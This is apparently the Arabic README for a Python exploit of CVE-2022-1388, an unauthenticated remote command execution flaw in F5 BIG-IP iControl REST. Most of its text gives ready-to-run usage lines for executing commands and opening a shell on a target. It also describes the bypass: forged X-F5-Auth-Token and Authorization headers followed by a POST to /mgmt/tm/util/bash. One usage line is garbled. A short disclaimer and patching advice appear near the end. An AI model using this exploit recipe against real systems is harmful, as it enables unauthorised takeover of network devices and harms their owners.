
يستغل هذا السكربت المكتوب بلغة بايثون ثغرة CVE-2022-1388، وهي ثغرة حرجة في F5 BIG-IP iControl REST تسمح بـتنفيذ أوامر عن بُعد دون مصادقة عبر التحكم غير السليم في الوصول ومعالجة ترويسات HTTP.
⚠️ لأغراض تعليمية وأبحاث أمنية مصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
--shell)python3 cve_2022_1388_exploit.py -u <target_url> -c "<command>"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -c "id"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -a "root:password" -c "whoami"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 --shell
يتجاوز السكربت المصادقة عن طريق تعيين ترويسات X-F5-Auth-Token و Authorization مزورة.
يرسل طلب POST إلى: /mgmt/tm/util/bash
يقوم الحمولة بتشغيل أمر الشل المحدد.
قم بالترقية إلى إصدارات F5 BIG-IP المصححة وفقًا لتوصيات نشرة F5 الأمنية.
قيّد الوصول إلى واجهة iControl REST.
يوفر سكربت الاستغلال هذا لأغراض تعليمية فقط. الاستخدام يتم بالكامل على مسؤوليتك الخاصة.